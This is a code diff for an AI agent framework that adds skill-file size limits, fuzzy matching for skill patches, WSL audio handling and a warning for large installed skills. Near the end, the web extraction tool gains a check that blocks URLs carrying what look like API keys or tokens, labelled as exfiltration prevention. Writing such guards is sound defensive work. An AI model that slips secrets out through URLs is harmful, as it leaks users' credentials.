+def _validate_content_size(content: str, label: str = "SKILL.md") -> Optional[str]:
+    """Return an error string if *content* is over MAX_SKILL_CONTENT_CHARS, else None.
+
+    *label* names the file in the message and selects the split advice: the
+    SKILL.md advice is only given for SKILL.md, not for supporting files.
+    """
+    if len(content) <= MAX_SKILL_CONTENT_CHARS:
+        return None
+    hint = ("Consider splitting into a smaller SKILL.md with supporting files "
+            "in references/ or templates/." if label == "SKILL.md"
+            else "Consider splitting into smaller files.")
+    return (f"{label} content is {len(content):,} characters "
+            f"(limit: {MAX_SKILL_CONTENT_CHARS:,}). {hint}")
+
+
 def _resolve_skill_dir(name: str, category: str = None) -> Path:
    """Build the directory path for a new skill, optionally under a category."""
    if category:
@@ -275,6 +292,10 @@ def _create_skill(name: str, content: str, category: str = None) -> Dict[str, An
    if err:
        return {"success": False, "error": err}

+    err = _validate_content_size(content)
+    if err:
+        return {"success": False, "error": err}
+
    # Check for name collisions across all directories
    existing = _find_skill(name)
    if existing:
@@ -318,6 +339,10 @@ def _edit_skill(name: str, content: str) -> Dict[str, Any]:
    if err:
        return {"success": False, "error": err}

+    err = _validate_content_size(content)
+    if err:
+        return {"success": False, "error": err}
+
    existing = _find_skill(name)
    if not existing:
        return {"success": False, "error": f"Skill '{name}' not found. Use skills_list() to see available skills."}
@@ -379,27 +404,29 @@ def _patch_skill(

    content = target.read_text(encoding="utf-8")

-    count = content.count(old_string)
-    if count == 0:
+    # Use the same fuzzy matching engine as the file patch tool.
+    # This handles whitespace normalization, indentation differences,
+    # escape sequences, and block-anchor matching — saving the agent
+    # from exact-match failures on minor formatting mismatches.
+    from tools.fuzzy_match import fuzzy_find_and_replace
+
+    new_content, match_count, match_error = fuzzy_find_and_replace(
+        content, old_string, new_string, replace_all
+    )
+    if match_error:
        # Show a short preview of the file so the model can self-correct
        preview = content[:500] + ("..." if len(content) > 500 else "")
        return {
            "success": False,
-            "error": "old_string not found in the file.",
+            "error": match_error,
            "file_preview": preview,
        }

-    if count > 1 and not replace_all:
-        return {
-            "success": False,
-            "error": (
-                f"old_string matched {count} times. Provide more surrounding context "
-                f"to make the match unique, or set replace_all=true to replace all occurrences."
-            ),
-            "match_count": count,
-        }
-
-    new_content = content.replace(old_string, new_string) if replace_all else content.replace(old_string, new_string, 1)
+    # Check size limit on the result
+    target_label = "SKILL.md" if not file_path else file_path
+    err = _validate_content_size(new_content, label=target_label)
+    if err:
+        return {"success": False, "error": err}

    # If patching SKILL.md, validate frontmatter is still intact
    if not file_path:
@@ -419,10 +446,9 @@ def _patch_skill(
        _atomic_write_text(target, original_content)
        return {"success": False, "error": scan_error}

-    replacements = count if replace_all else 1
    return {
        "success": True,
-        "message": f"Patched {'SKILL.md' if not file_path else file_path} in skill '{name}' ({replacements} replacement{'s' if replacements > 1 else ''}).",
+        "message": f"Patched {'SKILL.md' if not file_path else file_path} in skill '{name}' ({match_count} replacement{'s' if match_count > 1 else ''}).",
    }


@@ -455,6 +481,21 @@ def _write_file(name: str, file_path: str, file_content: str) -> Dict[str, Any]:
    if not file_content and file_content != "":
        return {"success": False, "error": "file_content is required."}

+    # Check size limits
+    content_bytes = len(file_content.encode("utf-8"))
+    if content_bytes > MAX_SKILL_FILE_BYTES:
+        return {
+            "success": False,
+            "error": (
+                f"File content is {content_bytes:,} bytes "
+                f"(limit: {MAX_SKILL_FILE_BYTES:,} bytes / 1 MiB). "
+                f"Consider splitting into smaller files."
+            ),
+        }
+    err = _validate_content_size(file_content, label=file_path)
+    if err:
+        return {"success": False, "error": err}
+
    existing = _find_skill(name)
    if not existing:
        return {"success": False, "error": f"Skill '{name}' not found. Create it first with action='create'."}
--- a/tools/skills_hub.py
+++ b/tools/skills_hub.py
@@ -2115,7 +2115,11 @@ class OptionalSkillSource(SkillSource):
    """

    def __init__(self):
-        self._optional_dir = Path(__file__).parent.parent / "optional-skills"
+        from hermes_constants import get_optional_skills_dir
+
+        self._optional_dir = get_optional_skills_dir(
+            Path(__file__).parent.parent / "optional-skills"
+        )

    def source_id(self) -> str:
        return "official"
@@ -2521,6 +2525,22 @@ def install_from_quarantine(
    if install_dir.exists():
        shutil.rmtree(install_dir)

+    # Warn (but don't block) if SKILL.md is very large
+    skill_md = quarantine_path / "SKILL.md"
+    if skill_md.exists():
+        try:
+            skill_size = skill_md.stat().st_size
+            if skill_size > 100_000:
+                logger.warning(
+                    "Skill '%s' has a large SKILL.md (%s chars). "
+                    "Large skills consume significant context when loaded. "
+                    "Consider asking the author to split it into smaller files.",
+                    safe_skill_name,
+                    f"{skill_size:,}",
+                )
+        except OSError:
+            pass
+
    install_dir.parent.mkdir(parents=True, exist_ok=True)
    shutil.move(str(quarantine_path), str(install_dir))

--- a/tools/voice_mode.py
+++ b/tools/voice_mode.py
@@ -51,9 +51,12 @@ def _audio_available() -> bool:
 def detect_audio_environment() -> dict:
    """Detect if the current environment supports audio I/O.

-    Returns dict with 'available' (bool) and 'warnings' (list of strings).
+    Returns dict with 'available' (bool), 'warnings' (list of hard-fail
+    reasons that block voice mode), and 'notices' (list of informational
+    messages that do NOT block voice mode).
    """
-    warnings = []
+    warnings = []   # hard-fail: these block voice mode
+    notices = []     # informational: logged but don't block

    # SSH detection
    if any(os.environ.get(v) for v in ('SSH_CLIENT', 'SSH_TTY', 'SSH_CONNECTION')):
@@ -63,11 +66,20 @@ def detect_audio_environment() -> dict:
    if os.path.exists('/.dockerenv'):
        warnings.append("Running inside Docker container -- no audio devices")

-    # WSL detection
+    # WSL detection — PulseAudio bridge makes audio work in WSL.
+    # Only block if PULSE_SERVER is not configured.
    try:
        with open('/proc/version', 'r') as f:
            if 'microsoft' in f.read().lower():
-                warnings.append("Running in WSL -- audio requires PulseAudio bridge to Windows")
+                if os.environ.get('PULSE_SERVER'):
+                    notices.append("Running in WSL with PulseAudio bridge")
+                else:
+                    warnings.append(
+                        "Running in WSL -- audio requires PulseAudio bridge.\n"
+                        "  1. Set PULSE_SERVER=unix:/mnt/wslg/PulseServer\n"
+                        "  2. Create ~/.asoundrc pointing ALSA at PulseAudio\n"
+                        "  3. Verify with: arecord -d 3 /tmp/test.wav && aplay /tmp/test.wav"
+                    )
    except (FileNotFoundError, PermissionError, OSError):
        pass

@@ -79,7 +91,12 @@ def detect_audio_environment() -> dict:
            if not devices:
                warnings.append("No audio input/output devices detected")
        except Exception:
-            warnings.append("Audio subsystem error (PortAudio cannot query devices)")
+            # In WSL with PulseAudio, device queries can fail even though
+            # recording/playback works fine. Don't block if PULSE_SERVER is set.
+            if os.environ.get('PULSE_SERVER'):
+                notices.append("Audio device query failed but PULSE_SERVER is set -- continuing")
+            else:
+                warnings.append("Audio subsystem error (PortAudio cannot query devices)")
    except ImportError:
        warnings.append("Audio libraries not installed (pip install sounddevice numpy)")
    except OSError:
@@ -93,6 +110,7 @@ def detect_audio_environment() -> dict:
    return {
        "available": len(warnings) == 0,
        "warnings": warnings,
+        "notices": notices,
    }

 # ---------------------------------------------------------------------------
@@ -748,6 +766,8 @@ def check_voice_requirements() -> Dict[str, Any]:

    for warning in env_check["warnings"]:
        details_parts.append(f"Environment: {warning}")
+    for notice in env_check.get("notices", []):
+        details_parts.append(f"Environment: {notice}")

    return {
        "available": available,
--- a/tools/web_tools.py
+++ b/tools/web_tools.py
@@ -1130,24 +1130,26 @@ def web_search_tool(query: str, limit: int = 5) -> str:


 async def web_extract_tool(
-    urls: List[str], 
-    format: str = None, 
+    urls: List[str],
+    format: str = None,
    use_llm_processing: bool = True,
    model: Optional[str] = None,
    min_length: int = DEFAULT_MIN_LENGTH_FOR_SUMMARIZATION
 ) -> str:
    """
    Extract content from specific web pages using available extraction API backend.
-    
+
    This function provides a generic interface for web content extraction that
    can work with multiple backends. Currently uses Firecrawl.
-    
+
    Args:
        urls (List[str]): List of URLs to extract content from
        format (str): Desired output format ("markdown" or "html", optional)
        use_llm_processing (bool): Whether to process content with LLM for summarization (default: True)
        model (Optional[str]): The model to use for LLM processing (defaults to current auxiliary backend model)
        min_length (int): Minimum content length to trigger LLM processing (default: 5000)
+
+    Security: URLs are checked for embedded secrets before fetching.
    
    Returns:
        str: JSON string containing extracted content. If LLM processing is enabled and successful,
@@ -1156,6 +1158,16 @@ async def web_extract_tool(
    Raises:
        Exception: If extraction fails or API key is not set
    """
+    # Block URLs containing embedded secrets (exfiltration prevention)
+    from agent.redact import _PREFIX_RE
+    for _url in urls:
+        if _PREFIX_RE.search(_url):
+            return json.dumps({
+                "success": False,
+                "error": "Blocked: URL contains what appears to be an API key or token. "
+                         "Secrets must not be sent in URLs.",
+            })
+
    debug_call_data = {
        "parameters": {
            "urls": urls,